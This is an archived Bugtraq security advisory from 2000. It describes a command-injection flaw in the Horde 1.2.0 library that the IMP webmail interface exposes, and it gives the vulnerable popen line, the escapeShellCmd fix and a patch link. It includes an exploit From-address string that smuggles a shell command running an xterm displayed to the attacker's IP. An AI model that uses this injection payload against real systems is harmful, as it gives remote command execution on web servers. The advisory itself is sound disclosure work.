Vulners
Lucene search
horde.txt
`Date: Fri, 8 Sep 2000 17:03:36 +0200
Sender: Bugtraq List <[email protected]>
From: "Winter, Christian" <[email protected]>
Subject: horde library bug - unchecked from-address
To: [email protected]
Hi,
this bug we discovered recently.
***** HORDE 1.2.0 $from-bug and how to exploit with IMP 2.2.0 ******
Disclaimer:
This is intended as a paper for sysadmins who want to secure
their systems. It is NOT a how to for scriptkiddies to run
any attack on a IMP-using site.
The authors of this text will not be held responsible for
any damage resulting from others using the documented exploits
for attacking or invading 3rd parties' computers or networks.
Release Date:
08/09/2000
Authors:
Bug found and exploited by Jens "atomi" Steube <[email protected]>
Fixed and documentated by Christian "thepoet" Winter
<[email protected]>
Affected
Versions:
The bug was found in the horde library code of Horde 1.2.0.
Other versions haven't been checked yet. If you are in doubt
that
your version is also buggy, please contact the horde authors as
described on http://horde.org.
Description:
The $from-bug is in the horde library file 'horde.lib',
(on debian systems installed in /usr/share/horde/lib/horde.lib)
in line 1108 belonging to function "mailfrom". In this file
there is a call to "popen" with an unchecked "from:"-line as
argument. Exact syntax is:
$mail = popen("$default->path_to_sendmail -i -f$from --
$recipients", 'w');
If the user passes a string containing the "&" char to the
function as
$from, commands can be executed under the uid and gid the
webserver is
running as.
Exploit:
Usually the horde.lib/mailfrom function is called by
the IMP webmail interface. As IMP also does not check for
the "&" char, it is passed on to popen(). There are also
some other software-projects using the hordelib - they
also could be exploited by the same means.
1) Just open an IMP and press Compose to write a new mail
2) As your From-EMail Adress an exploit $from-line could be:
&"/usr/X11R6/bin/xterm -display 127.0.0.1:0.0"&
(Remember most people should replace 127.0.0.1 with their own IP
and also verify the path to xterm)
or any other command you want.
3) enter a recipient
4) Send message, done.
Fix:
The horde library already provides a function that prevents this
kind of exploits, called "escapeShellCmd". It is used with the
"$recipients" var but not with "$from".
To secure the installed horde it is sufficient to add the
following
line 1108 in /usr/share/horde/lib/horde.lib:
$from = escapeShellCmd( $from );
or download a patch form:
http://ssl.coc-ag.de/sec/hordelib-1.2.0.frombug.patch
****************************************************************************
******
Greetings
Christian
--
thepoet <[email protected]>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2000 00:00Current